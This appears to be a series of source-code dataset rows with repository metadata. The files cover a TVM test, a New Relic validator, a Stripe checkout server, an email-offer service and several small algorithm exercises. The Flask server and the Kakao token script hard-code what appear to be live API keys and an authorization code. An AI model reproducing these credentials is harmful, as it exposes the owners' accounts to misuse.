while(solved == False):
#Update counter
counter +=1
#Generate an Array of methodIDs(as numbers)
dezimal = counter
check = True
while(check):
check = False;
Ergebnis = "";
methodArray = []
c = 0;
while(dezimal >= 18):
methodArray.append(dezimal % 18)
dezimal = (dezimal-(dezimal % 18))/18
if c > 10:
check = True
break
methodArray.append(dezimal % 18)
methodArray.reverse()
#Update cubeYouHave with methodArray
for i in range(0, len(methodArray)):
cubeYouHave.changeCube(methodIDs.get(methodArray[i]))
#Comparing
if compareCubes(cubeYouHave,cubeToGet):
solved = True
#Reset cubeYouHave
methodArray.reverse()
for i in range(0, len(methodArray)):
for d in range(0, 3):
cubeYouHave.changeCube(methodIDs.get(methodArray[i]))
if solved == True:
methodArray.reverse()
print( methodArray) #(return)
| 31.730159 | 116 | 0.50025 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 286 | 0.143072 |
17b41cbaf511e453fc40d63d8ba1e2b7897da14a | 3,494 | py | Python | tests/python/contrib/test_ethosu/cascader/test_ethosu_conv2d_matcher.py | LEA0317/incubator-tvm | de21c8f2ef507587fdcc99b851404de5aeeb5a16 | [
"Apache-2.0"
] | 90 | 2021-11-30T11:58:10.000Z | 2022-03-31T02:24:04.000Z | tests/python/contrib/test_ethosu/cascader/test_ethosu_conv2d_matcher.py | LEA0317/incubator-tvm | de21c8f2ef507587fdcc99b851404de5aeeb5a16 | [
"Apache-2.0"
] | 64 | 2021-11-22T23:58:23.000Z | 2022-03-31T03:19:22.000Z | tests/python/contrib/test_ethosu/cascader/test_ethosu_conv2d_matcher.py | LEA0317/incubator-tvm | de21c8f2ef507587fdcc99b851404de5aeeb5a16 | [
"Apache-2.0"
] | 27 | 2021-12-09T22:39:27.000Z | 2022-03-24T23:21:48.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pytest
pytest.importorskip("ethosu.vela")
from tvm import te
import tvm.contrib.ethosu.cascader as cs
from tvm.relay.backend.contrib.ethosu.te.convolution import match_ethosu_conv2d, conv2d_compute
from .infra import make_matrices
@pytest.mark.parametrize("kernel", [(3, 3), (2, 1), (3, 5)])
@pytest.mark.parametrize("stride", [(1, 1), (2, 1), (3, 2)])
@pytest.mark.parametrize("dilation", [(1, 1), (2, 1), (3, 2)])
@pytest.mark.parametrize("padding", [(0, 0, 0, 0), (3, 2, 3, 2), (2, 1, 0, 1)])
@pytest.mark.parametrize("ifm_channels", [8, 57])
@pytest.mark.parametrize("ifm_layout", ["NHWC", "NHCWB16"])
@pytest.mark.parametrize("ofm_layout", ["NHWC", "NHCWB16"])
def test_ethosu_conv2d_matcher(
kernel, stride, dilation, padding, ifm_channels, ifm_layout, ofm_layout
):
if ifm_layout == "NHWC":
ifm_shape = (1, 12, 15, ifm_channels)
else:
ifm_shape = (1, 12, 1 + ((ifm_channels - 1) // 16), 15, 16)
ofm_channels = 8
kernel_h, kernel_w = kernel
ifm = te.placeholder(ifm_shape, dtype="int8")
weight = te.placeholder((ofm_channels, kernel_h, kernel_w, ifm_channels), dtype="int8")
scale_bias = te.placeholder((ofm_channels, 10), dtype="uint8")
lut = te.placeholder((), dtype="uint8")
out = conv2d_compute(
ifm=ifm,
weight=weight,
scale_bias=scale_bias,
lut=lut,
ifm_scale=1,
ifm_zero_point=0,
ofm_scale=1,
ofm_zero_point=0,
weight_zero_point=0,
strides=stride,
padding=padding,
dilation=dilation,
activation="NONE",
clip_min=0,
clip_max=0,
upscale="NONE",
rounding_mode="TFL",
ifm_layout=ifm_layout,
ofm_layout=ofm_layout,
)
(
ifm_transform,
ifm_offset,
weight_transform,
weight_offset,
scale_bias_transform,
scale_bias_offset,
) = make_matrices(
"ethosu_conv2d",
kernel,
stride,
padding,
ifm_layout,
ofm_layout,
dilation,
ifm_channels,
ofm_channels,
)
device_config = cs.EthosuDeviceConfig("ethos-u55-256")
part = match_ethosu_conv2d(out, device_config)
assert isinstance(part, cs.EthosuPart)
assert len(part.propagators) == 3
assert part.propagators[0].transform == ifm_transform
assert part.propagators[0].offset == ifm_offset
assert part.propagators[1].transform == weight_transform
assert part.propagators[1].offset == weight_offset
assert part.propagators[2].transform == scale_bias_transform
assert part.propagators[2].offset == scale_bias_offset
if __name__ == "__main__":
pytest.main([__file__])
| 33.92233 | 95 | 0.670864 | 0 | 0 | 0 | 0 | 2,408 | 0.689181 | 0 | 0 | 974 | 0.278764 |
17b4c6a525923c76105b1e66c532efc33cd33653 | 23 | py | Python | __init__.py | mendhak/aws-elb-logster | 4122f03fd3977225269190fff60fd5d7935ddeaf | [
"MIT"
] | 2 | 2015-09-14T22:16:52.000Z | 2016-04-11T17:08:32.000Z | __init__.py | mendhak/aws-elb-logster | 4122f03fd3977225269190fff60fd5d7935ddeaf | [
"MIT"
] | null | null | null | __init__.py | mendhak/aws-elb-logster | 4122f03fd3977225269190fff60fd5d7935ddeaf | [
"MIT"
] | null | null | null | #
# Python init file
#
| 5.75 | 18 | 0.608696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 20 | 0.869565 |
17b5611d8bfcc949adaf08263c632359cd3eeee4 | 1,925 | py | Python | tests/testing_support/validators/validate_serverless_payload.py | newrelic/newrelic-python-agen | 4f292ec1219c0daffc5721a7b3a245b97d0f83ba | [
"Apache-2.0"
] | 92 | 2020-06-12T17:53:23.000Z | 2022-03-01T11:13:21.000Z | tests/testing_support/validators/validate_serverless_payload.py | newrelic/newrelic-python-agen | 4f292ec1219c0daffc5721a7b3a245b97d0f83ba | [
"Apache-2.0"
] | 347 | 2020-07-10T00:10:19.000Z | 2022-03-31T17:58:56.000Z | tests/testing_support/validators/validate_serverless_payload.py | newrelic/newrelic-python-agen | 4f292ec1219c0daffc5721a7b3a245b97d0f83ba | [
"Apache-2.0"
] | 58 | 2020-06-17T13:51:57.000Z | 2022-03-06T14:26:53.000Z | # Copyright 2010 New Relic, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from newrelic.common.encoding_utils import (serverless_payload_decode,
json_decode)
from newrelic.common.object_wrapper import (
transient_function_wrapper,
function_wrapper)
def validate_serverless_payload(count=1):
@function_wrapper
def _validate_wrapper(wrapped, instance, args, kwargs):
payloads = []
@transient_function_wrapper('newrelic.core.data_collector',
'ServerlessModeSession.finalize')
def _capture(wrapped, instance, args, kwargs):
payload = wrapped(*args, **kwargs)
payloads.append(payload)
return payload
def _validate():
assert len(payloads) == count
for payload in payloads:
assert isinstance(payload, str)
obj = json_decode(payload)
assert len(obj) == 3, obj
assert obj[0] == 1 # Version = 1
assert obj[1] == 'NR_LAMBDA_MONITORING' # Marker
decoded = serverless_payload_decode(obj[2])
# Keys should only contain metadata / data
set(decoded.keys()) == set(('metadata', 'data'))
capture_wrapped = _capture(wrapped)
result = capture_wrapped(*args, **kwargs)
_validate()
return result
return _validate_wrapper
| 32.627119 | 74 | 0.648831 | 0 | 0 | 0 | 0 | 1,065 | 0.553247 | 0 | 0 | 730 | 0.379221 |
17b5722e5e60de2426f1160b8b162178106fdd0c | 890 | py | Python | kakao_message_utils/request_token.py | hahagarden/project_news_summarize | 1c47e2ec30cff715a0c56b20f50a9ffa53ded274 | [
"MIT"
] | null | null | null | kakao_message_utils/request_token.py | hahagarden/project_news_summarize | 1c47e2ec30cff715a0c56b20f50a9ffa53ded274 | [
"MIT"
] | null | null | null | kakao_message_utils/request_token.py | hahagarden/project_news_summarize | 1c47e2ec30cff715a0c56b20f50a9ffa53ded274 | [
"MIT"
] | null | null | null | import token_def
# To get Authorization Code
# https://kauth.kakao.com/oauth/authorize?client_id=cc335daa766cc74b3de1b1c372a6cce8&response_type=code&redirect_uri=https://localhost.com
KAKAO_APP_KEY = "cc335daa766cc74b3de1b1c372a6cce8" # REST_API app key
AUTHORIZATION_CODE = "flzXSvhelQ3LLzmAKyo5-bQsafEyGOyFAMyK4N-dTii5B-SxG3-KimikA5vq0zD1ChZ_jQo9dVsAAAF8OjRb-g" # once in a run
KAKAO_TOKEN_FILENAME = "/Users/jeongwon/Documents/GitHub/project_news_summarize/json/kakao_token.json" # Token in this file(.json)
# To get Access Token
tokens = token_def.request_tokens(KAKAO_APP_KEY, AUTHORIZATION_CODE)
# To save Access Token in the file(.json)
token_def.save_tokens(KAKAO_TOKEN_FILENAME, tokens)
# # To update Refresh Token after the Access Token is expired
# tokens=token_def.update_tokens(KAKAO_APP_KEY, KAKAO_TOKEN_FILENAME)
# token_def.save_tokens(KAKAO_TOKEN_FILENAME, tokens)
| 46.842105 | 138 | 0.830337 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 671 | 0.753933 |
17b8f007031e6b77982d4da9880cd3ac7fe940b3 | 1,717 | py | Python | test/unit/messages/bloxroute/test_abstract_bloxroute_message.py | dolphinridercrypto/bxcommon | 8f70557c1dbff785a5dd3fcdf91176066e085c3a | [
"MIT"
] | 12 | 2019-11-06T17:39:10.000Z | 2022-03-01T11:26:19.000Z | test/unit/messages/bloxroute/test_abstract_bloxroute_message.py | dolphinridercrypto/bxcommon | 8f70557c1dbff785a5dd3fcdf91176066e085c3a | [
"MIT"
] | 8 | 2019-11-06T21:31:11.000Z | 2021-06-02T00:46:50.000Z | test/unit/messages/bloxroute/test_abstract_bloxroute_message.py | dolphinridercrypto/bxcommon | 8f70557c1dbff785a5dd3fcdf91176066e085c3a | [
"MIT"
] | 5 | 2019-11-14T18:08:11.000Z | 2022-02-08T09:36:22.000Z | from bxcommon.test_utils.abstract_test_case import AbstractTestCase
from bxcommon import constants
from bxcommon.messages.bloxroute.abstract_bloxroute_message import AbstractBloxrouteMessage
from bxcommon.messages.bloxroute.bloxroute_message_control_flags import BloxrouteMessageControlFlags
class TestAbstractBloxrouteMessage(AbstractTestCase):
def test_asbstract_bloxroute_message(self):
total_msg_len = 1000
msg_type = b"dummy_msg"
payload_len = total_msg_len - constants.BX_HDR_COMMON_OFF - constants.STARTING_SEQUENCE_BYTES_LEN
buffer = bytearray(total_msg_len)
message = AbstractBloxrouteMessage(msg_type=msg_type, payload_len=payload_len, buf=buffer)
raw_bytes = message.rawbytes()
self.assertEqual(total_msg_len, len(raw_bytes))
self.assertEqual(msg_type, message.msg_type())
self.assertEqual(payload_len, message.payload_len())
self.assertEqual(payload_len, len(message.payload()))
self.assertTrue(BloxrouteMessageControlFlags.VALID in BloxrouteMessageControlFlags(message.get_control_flags()))
message.remove_control_flag(BloxrouteMessageControlFlags.VALID)
self.assertFalse(BloxrouteMessageControlFlags.VALID in BloxrouteMessageControlFlags(message.get_control_flags()))
message.set_control_flag(BloxrouteMessageControlFlags.VALID)
self.assertTrue(BloxrouteMessageControlFlags.VALID in BloxrouteMessageControlFlags(message.get_control_flags()))
# Trying set already set flag
message.set_control_flag(BloxrouteMessageControlFlags.VALID)
self.assertTrue(BloxrouteMessageControlFlags.VALID in BloxrouteMessageControlFlags(message.get_control_flags()))
| 50.5 | 121 | 0.798486 | 1,422 | 0.828189 | 0 | 0 | 0 | 0 | 0 | 0 | 41 | 0.023879 |
17bab85be9766c1e62d10b8ba5e92bbbc7204442 | 1,139 | py | Python | test/python/LIM2Metrics/py3/base/common/Bridge/Bridge.py | sagodiz/SonarQube-plug-in | 4f8e111baecc4c9f9eaa5cd3d7ebeb1e365ace2c | [
"BSD-4-Clause"
] | 20 | 2015-06-16T17:39:10.000Z | 2022-03-20T22:39:40.000Z | test/python/LIM2Metrics/py3/base/common/Bridge/Bridge.py | sagodiz/SonarQube-plug-in | 4f8e111baecc4c9f9eaa5cd3d7ebeb1e365ace2c | [
"BSD-4-Clause"
] | 29 | 2015-12-29T19:07:22.000Z | 2022-03-22T10:39:02.000Z | test/python/LIM2Metrics/py3/base/common/Bridge/Bridge.py | sagodiz/SonarQube-plug-in | 4f8e111baecc4c9f9eaa5cd3d7ebeb1e365ace2c | [
"BSD-4-Clause"
] | 12 | 2015-08-28T01:22:18.000Z | 2021-09-25T08:17:31.000Z | # Implementor
class drawing_api:
def draw_circle(self, x, y, radius):
pass
# ConcreteImplementor 1/2
class drawing_api1(drawing_api):
def draw_circle(self, x, y, radius):
print('API1.circle at %f:%f radius %f' % (x, y, radius))
# ConcreteImplementor 2/2
class drawing_api2(drawing_api):
def draw_circle(self, x, y, radius):
print('API2.circle at %f:%f radius %f' % (x, y, radius))
# Abstraction
class Shape:
def draw(self):
pass
def resize_by_percentage(self, pct):
pass
# Refined Abstraction
class CircleShape(Shape):
def __init__(self, x, y, radius, drawing_api):
self.x = x
self.y = y
self.radius = radius
self.drawing_api = drawing_api
def draw(self):
self.drawing_api.draw_circle(self.x, self.y, self.radius)
def resize_by_percentage(self, pct):
self.radius *= pct
# Client
if __name__ == '__main__':
shapes = [
CircleShape(1, 2, 3, drawing_api1()),
CircleShape(5, 7, 11, drawing_api2())
]
for shape in shapes:
shape.resize_by_percentage(2.5)
shape.draw()
| 23.729167 | 65 | 0.62072 | 785 | 0.689201 | 0 | 0 | 0 | 0 | 0 | 0 | 179 | 0.157155 |
17bb9ce8b0c4820397f46ae9b7245ef217260243 | 6,162 | py | Python | server/main.py | priyanshujha98/leilaportal | 2f4f51173b0186b07e4c14fc06a2ecc715cf7eb7 | [
"MIT"
] | null | null | null | server/main.py | priyanshujha98/leilaportal | 2f4f51173b0186b07e4c14fc06a2ecc715cf7eb7 | [
"MIT"
] | null | null | null | server/main.py | priyanshujha98/leilaportal | 2f4f51173b0186b07e4c14fc06a2ecc715cf7eb7 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3.6
"""
server.py
Stripe Sample.
Python 3.6 or newer required.
"""
import stripe
import json
import os
import requests
#flask
from flask import Flask, render_template, jsonify, request, send_from_directory, session, Session
from flask_session import Session
from dotenv import load_dotenv, find_dotenv
# Sendgrid
from sendgrid import SendGridAPIClient
from sendgrid.helpers.mail import Mail
# Setup Stripe python client library
load_dotenv(find_dotenv())
stripe.api_key = os.getenv('STRIPE_SECRET_KEY')
stripe.api_version = os.getenv('STRIPE_API_VERSION')
static_dir = str(os.path.abspath(os.path.join(
__file__, "..", os.getenv("STATIC_DIR"))))
app = Flask(__name__, static_folder=static_dir,
static_url_path="", template_folder=static_dir)
SESSION_TYPE = 'filesystem'
app.config.from_object(__name__)
app.secret_key = b'ilnzdfsdf'
# app.config['SERVER_NAME'] = 'requests.drleilamasson.com'
app.config['SECRET_KEY'] = b'ilnzdfsdf'
Session(app)
@app.route('/', methods=['GET'])
def get_example():
print(session.sid)
try:
print(session['patient'])
except Exception as e:
print(e)
return render_template('index.html')
@app.route('/config', methods=['GET'])
def get_publishable_key():
return jsonify({
'publicKey': os.getenv('STRIPE_PUBLISHABLE_KEY'),
'basePrice': os.getenv('BASE_PRICE'),
'currency': os.getenv('CURRENCY')
})
# Fetch the Checkout Session to display the JSON result on the success page
@app.route('/checkout-session', methods=['GET'])
def get_checkout_session():
print("Attempting to send emaill beep")
#TODO: if session[patient] != 0, to ensure security
id = request.args.get('sessionId')
checkout_session = stripe.checkout.Session.retrieve(id)
print(session.sid)
print("with get: ", session.get('patient', 'NULL/notset'))
# print('check:, ' + session['patient'])
message = Mail(
from_email='manummasson8@gmail.com',
to_emails='manummasson8@gmail.com',
subject='New request for ' + session.get('medication', 'NULL/notset') + ' by ' + session.get('patient', 'NULL/notset'),
html_content='<li><h2>From: </h2>' + session.get('patient', 'NULL/notset') + "at " + session.get('email', 'NULL/notset') + ', ' + session.get('phone', 'NULL/notset') +'</li>'
+ '<li><h2>Medication: </h2><h3>' + session.get('medication', 'NULL/notset') + '</h3></li>'
+ '<li><h2>Pharmacy: </h2><h3>' + session.get('pharmacy', 'NULL/notset') + '</h3></li>'
+ '<li><h2>Notes: </h2> <h3>' + session.get('notes', 'NULL/notset') + '</h3></li>'
)
try:
sg = SendGridAPIClient('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')
response = sg.send(message)
print(response.status_code)
print(response.body)
print(response.headers)
except Exception as e:
print(e)
# session['patient'] = 0
print("Test?")
return jsonify(checkout_session)
@app.route('/create-checkout-session', methods=['POST'])
def create_checkout_session():
data = json.loads(request.data)
domain_url = os.getenv('DOMAIN')
try:
# Create new Checkout Session for the order
# Other optional params include:
# [billing_address_collection] - to display billing address details on the page
# [customer] - if you have an existing Stripe Customer ID
# [payment_intent_data] - lets capture the payment later
# [customer_email] - lets you prefill the email input in the form
# For full details see https:#stripe.com/docs/api/checkout/sessions/create
# ?session_id={CHECKOUT_SESSION_ID} means the redirect will have the session ID set as a query param
print(data)
session['patient'] = data['patient']
session['email'] = data['email']
session['phone'] = data['phone']
session['medication'] = data['medication']
session['pharmacy'] = data['pharmacy']
session['notes'] = data['notes']
print("no get: ", session['patient'])
print("with get: ", session.get('patient', 'NULL/notset'))
session.modified = True
checkout_session = stripe.checkout.Session.create(
success_url=domain_url +
"/success.html?session_id={CHECKOUT_SESSION_ID}",
cancel_url=domain_url + "/canceled.html",
payment_method_types=["card"],
line_items=[
{
"name": "Script",
"quantity": data['quantity'],
"currency": os.getenv('CURRENCY'),
"amount": os.getenv('BASE_PRICE')
}
]
)
return jsonify({'sessionId': checkout_session['id']})
except Exception as e:
print("ERRROR", e)
return jsonify(e), 40
@app.route('/webhook', methods=['POST'])
def webhook_received():
# You can use webhooks to receive information about asynchronous payment events.
# For more about our webhook events check out https://stripe.com/docs/webhooks.
webhook_secret = os.getenv('STRIPE_WEBHOOK_SECRET')
request_data = json.loads(request.data)
if webhook_secret:
# Retrieve the event by verifying the signature using the raw body and secret if webhook signing is configured.
signature = request.headers.get('stripe-signature')
try:
event = stripe.Webhook.construct_event(
payload=request.data, sig_header=signature, secret=webhook_secret)
data = event['data']
except Exception as e:
return e
# Get the type of webhook event sent - used to check the status of PaymentIntents.
event_type = event['type']
else:
data = request_data['data']
event_type = request_data['type']
data_object = data['object']
print('event ' + event_type)
if event_type == 'checkout.session.completed':
print('Payment succeeded!')
return jsonify({'status': 'success'})
if __name__ == '__main__':
app.run(port=4242)
| 34.617978 | 182 | 0.636644 | 0 | 0 | 0 | 0 | 5,028 | 0.815969 | 0 | 0 | 2,595 | 0.42113 |
17bc3e483fd3d3f977cf7a9dcbaef4c2331e4edd | 3,992 | py | Python | src/synthesize_predictions.py | bluetyson/concept-tagging-training | 449388748155a8f2e398d24d750e5d3871f8e75d | [
"MIT"
] | 10 | 2020-06-21T04:30:05.000Z | 2022-01-10T01:24:58.000Z | src/synthesize_predictions.py | bluetyson/concept-tagging-training | 449388748155a8f2e398d24d750e5d3871f8e75d | [
"MIT"
] | 4 | 2020-06-30T03:47:23.000Z | 2021-07-12T19:33:52.000Z | src/synthesize_predictions.py | bluetyson/concept-tagging-training | 449388748155a8f2e398d24d750e5d3871f8e75d | [
"MIT"
] | 8 | 2020-06-19T13:24:47.000Z | 2021-09-13T02:09:21.000Z | import argparse
import logging
from pathlib import Path
import dask
import h5py
import joblib
import numpy as np
import pandas as pd
from dask.diagnostics import ProgressBar
from tqdm import tqdm
from dsconcept.get_metrics import (
get_cat_inds,
get_synth_preds,
load_category_models,
load_concept_models,
HierarchicalClassifier,
get_mets,
)
logging.basicConfig(level=logging.INFO)
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.INFO)
def main(
experiment_name,
synth_strat,
in_cat_preds,
out_store,
synth_batch_size,
t,
out_synth_scores,
limit=None,
con_limit=None,
):
test_inds = np.load(f"data/interim/{experiment_name}/test_inds.npy")
feature_matrix = joblib.load(f"data/interim/{experiment_name}/feature_matrix.jbl")
in_cat_models = Path(f"models/{experiment_name}/categories/models/")
in_kwd_models = Path(f"models/{experiment_name}/keywords/models/")
cat_preds = np.load(in_cat_preds) # based on experiment or explicit path?
cat_clfs = load_category_models(in_cat_models)
cd = load_concept_models(in_kwd_models)
clf = HierarchicalClassifier(cat_clfs, cd)
if limit is not None:
LOG.info(f"Limiting to {limit} test records.")
feature_matrix_test = feature_matrix.tocsc()[test_inds[0:limit], :]
cat_preds = cat_preds[0:limit, :]
# TODO: How does this affect indices?
else:
feature_matrix_test = feature_matrix.tocsc()[test_inds, :]
LOG.info(f'Synthesizing predictions with strategy "{synth_strat}".')
all_cat_inds = get_cat_inds(clf.categories, cat_preds, t=t)
if con_limit is not None:
conwc = clf.concepts_with_classifiers[0:con_limit]
else:
conwc = clf.concepts_with_classifiers
shape = (feature_matrix_test.shape[0], len(conwc))
with tqdm(total=shape[0]) as pbar:
get_synth_preds(
out_store,
shape,
all_cat_inds,
clf.categories,
synth_batch_size,
only_cat=False,
synth_strat=synth_strat,
con_limit=con_limit,
limit=limit,
pbar=pbar,
)
LOG.info("Obtaining metrics.")
with h5py.File(out_store, "r") as f0:
if limit is not None:
target_values = f0["ground_truth"][0:limit, :]
else:
target_values = f0["ground_truth"].value
with h5py.File(out_store, "r") as f0:
synth_preds = f0["synthesis"].value
jobs = []
mets_pbar = tqdm(
range(len(conwc)),
total=len(conwc),
)
for i in mets_pbar:
job = dask.delayed(get_mets)(
i, synth_preds, target_values, conwc, mets_pbar
)
jobs.append(job)
records = dask.compute(jobs)
new_recs_df = pd.DataFrame(records[0])
LOG.info(f"Saving results to {out_synth_scores}.")
new_recs_df.to_csv(out_synth_scores)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Say hello")
parser.add_argument("--experiment_name", help="input txt file")
parser.add_argument("--synth_strat", help="input txt file")
parser.add_argument("--in_cat_preds", help="input txt file")
parser.add_argument("--store", help="input txt file")
parser.add_argument("--synth_batch_size", help="input txt file", type=int)
parser.add_argument("--threshold", help="input txt file", type=float)
parser.add_argument("--out_synth_scores", help="input txt file")
parser.add_argument(
"--limit", help="size for sample to test synthesis", type=int, default=None
)
parser.add_argument(
"--con_limit", help="size for concept sample", type=int, default=None
)
args = parser.parse_args()
main(
args.experiment_name,
args.synth_strat,
args.in_cat_preds,
args.store,
args.synth_batch_size,
args.threshold,
args.out_synth_scores,
args.limit,
args.con_limit,
)
| 31.1875 | 86 | 0.661072 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 791 | 0.198146 |
17c11d2e03854c10df90cd4aba0694838e082d86 | 1,359 | py | Python | LeetCode/python/211-240/216-cobination-sum-iii/solution.py | shootsoft/practice | 49f28c2e0240de61d00e4e0291b3c5edd930e345 | [
"Apache-2.0"
] | null | null | null | LeetCode/python/211-240/216-cobination-sum-iii/solution.py | shootsoft/practice | 49f28c2e0240de61d00e4e0291b3c5edd930e345 | [
"Apache-2.0"
] | null | null | null | LeetCode/python/211-240/216-cobination-sum-iii/solution.py | shootsoft/practice | 49f28c2e0240de61d00e4e0291b3c5edd930e345 | [
"Apache-2.0"
] | null | null | null | class Solution:
# @param {integer} k
# @param {integer} n
# @return {integer[][]}
def combinationSum3(self, k, n):
nums = range(1, 10)
self.results = []
self.combination(nums, n, k, 0, [])
return self.results
def combination(self, nums, target, k, start, result):
if k <= 0 :
return
elif k == 1:
for i in nums:
if i == target:
self.results.append([i])
elif k == 2:
end = len(nums) - 1
while start < end:
s = nums[start] + nums[end]
if s == target:
result.append(nums[start])
result.append(nums[end])
self.results.append(result[:])
result.pop()
result.pop()
start += 1
elif s < target:
start += 1
else:
#s > target
end -= 1
else:
for i in range(start, len(nums)-1):
t = target - nums[i]
if t >= nums[i+1]:
result.append(nums[i])
self.combination(nums, t, k -1, i + 1, result )
result.pop()
else:
break | 28.3125 | 67 | 0.382634 | 1,359 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 74 | 0.054452 |
17c267cdf68b5d5312402448c8870bbe5e04350c | 3,543 | py | Python | service/resources/appointment_offer.py | SFDigitalServices/otc_appointments | 62627deafa123e0bc0df367441f3c202c3176b3e | [
"MIT"
] | null | null | null | service/resources/appointment_offer.py | SFDigitalServices/otc_appointments | 62627deafa123e0bc0df367441f3c202c3176b3e | [
"MIT"
] | null | null | null | service/resources/appointment_offer.py | SFDigitalServices/otc_appointments | 62627deafa123e0bc0df367441f3c202c3176b3e | [
"MIT"
] | null | null | null | """Email module"""
#pylint: disable=too-few-public-methods
import json
import os
import falcon
import requests
from mako.template import Template
import sendgrid
from sendgrid.helpers.mail import Email, To, Content, Mail
from .hooks import validate_access
FROM_EMAIL = "no-reply@sf.gov"
SUBJECT = "Appointment Offering"
SPREADSHEETS_MICROSERVICE_URL = os.environ.get("SPREADSHEETS_MICROSERVICE_URL")
SPREADSHEETS_MICROSERVICE_API_KEY = os.environ.get("SPREADSHEETS_MICROSERVICE_API_KEY")
SPREADSHEET_KEY = os.environ.get("SPREADSHEET_KEY")
SPREADSHEETS_ID_COL = "A"
SPREADSHEETS_RESPONSE_COL = "AL"
SITE_DOMAIN = os.environ.get("SITE_DOMAIN")
SENDGRID_API_KEY = os.environ.get('SENDGRID_API_KEY')
@falcon.before(validate_access)
class EmailOffer():
"""EmailOffer class"""
def on_post(self, _req, resp):
#pylint: disable=no-self-use
"""
Send email to offer a new appointment
"""
request_body = _req.bounded_stream.read()
request_params_json = json.loads(request_body)
template = Template(filename="templates/appointment_offer.html")
sg = sendgrid.SendGridAPIClient(api_key=SENDGRID_API_KEY) #pylint: disable=invalid-name
from_email = Email(FROM_EMAIL)
to_email = To(request_params_json.get("to"))
content = Content("text/html", template.render(
site=SITE_DOMAIN,
id=request_params_json.get('id'),
name=request_params_json.get('name'),
newDate=request_params_json.get('newDate'),
newTime=request_params_json.get('newTime'),
oldDate=request_params_json.get('oldDate'),
oldTime=request_params_json.get('oldTime')
))
mail = Mail(from_email, to_email, SUBJECT, content)
response = sg.client.mail.send.post(request_body=mail.get())
print(response.status_code)
print(response.body)
print(response.headers)
resp.body = response.body
resp.status_code = falcon.HTTP_200
class OfferResponse():
"""record applicant response to the offer"""
def on_get(self, _req, resp):
#pyint: disable=no-self-use
"""
write the response to google sheet
"""
try:
data = create_spreadsheets_json()
data["label_value_map"] = {
SPREADSHEETS_RESPONSE_COL: _req.params.get('action')
}
print(data)
response = requests.patch(
url='{0}/rows/{1}'.format(SPREADSHEETS_MICROSERVICE_URL, _req.params.get('id')),
headers=get_request_headers(),
json=data
)
response.raise_for_status()
resp.content_type = falcon.MEDIA_HTML
template = Template(filename='templates/email_response.html')
resp.body = template.render()
resp.status = falcon.HTTP_200
except requests.HTTPError as err:
print("HTTPError:")
print("{0} {1}".format(err.response.status_code, err.response.text))
resp.status = falcon.get_http_status(err.response.status_code)
resp.body = json.dumps(err.response.json())
def get_request_headers():
"""
headers for request to spreadsheets microservice
"""
return {
'x-apikey': SPREADSHEETS_MICROSERVICE_API_KEY
}
def create_spreadsheets_json():
return {
"spreadsheet_key": SPREADSHEET_KEY,
"worksheet_title": "Sheet1",
"id_column_label": SPREADSHEETS_ID_COL,
} | 36.153061 | 96 | 0.65199 | 2,455 | 0.692916 | 0 | 0 | 1,310 | 0.369743 | 0 | 0 | 821 | 0.231725 |
17c5134f523338eb38c2be750ed00943cad1dc8d | 34 | py | Python | matfactor/__init__.py | Joshua-Chin/matfactor | 6730ca7ddb7844d9d50f7e5725f5ccdaae31721b | [
"Apache-2.0"
] | 1 | 2018-02-13T02:55:16.000Z | 2018-02-13T02:55:16.000Z | matfactor/__init__.py | Joshua-Chin/matfactor | 6730ca7ddb7844d9d50f7e5725f5ccdaae31721b | [
"Apache-2.0"
] | null | null | null | matfactor/__init__.py | Joshua-Chin/matfactor | 6730ca7ddb7844d9d50f7e5725f5ccdaae31721b | [
"Apache-2.0"
] | null | null | null | from ._factorize import factorize
| 17 | 33 | 0.852941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
17c5738139be0ff3cd10e6b345ccee28c0202628 | 752 | py | Python | C++/1059-All-Paths-from-Source-Lead-to-Destination/soln-1.py | wyaadarsh/LeetCode-Solutions | 3719f5cb059eefd66b83eb8ae990652f4b7fd124 | [
"MIT"
] | 5 | 2020-07-24T17:48:59.000Z | 2020-12-21T05:56:00.000Z | C++/1059-All-Paths-from-Source-Lead-to-Destination/soln-1.py | zhangyaqi1989/LeetCode-Solutions | 2655a1ffc8678ad1de6c24295071308a18c5dc6e | [
"MIT"
] | null | null | null | C++/1059-All-Paths-from-Source-Lead-to-Destination/soln-1.py | zhangyaqi1989/LeetCode-Solutions | 2655a1ffc8678ad1de6c24295071308a18c5dc6e | [
"MIT"
] | 2 | 2020-07-24T17:49:01.000Z | 2020-08-31T19:57:35.000Z | class Solution {
public:
bool leadsToDestination(int n, vector<vector<int>>& edges, int source, int destination) {
for(auto & edge : edges) {
int u = edge[0], v = edge[1];
graph[u].push_back(v);
}
vector<bool> visited(n, false);
return dfs(source, destination, visited);
}
private:
bool dfs(int node, int target, vector<bool> & visited) {
if (graph.find(node) == graph.end()) return node == target;
visited[node] = true;
for (int nei : graph[node]) {
if (visited[nei] || !dfs(nei, target, visited))
return false;
}
visited[node] = false;
return true;
}
unordered_map<int, vector<int>> graph;
};
| 30.08 | 93 | 0.542553 | 230 | 0.305851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
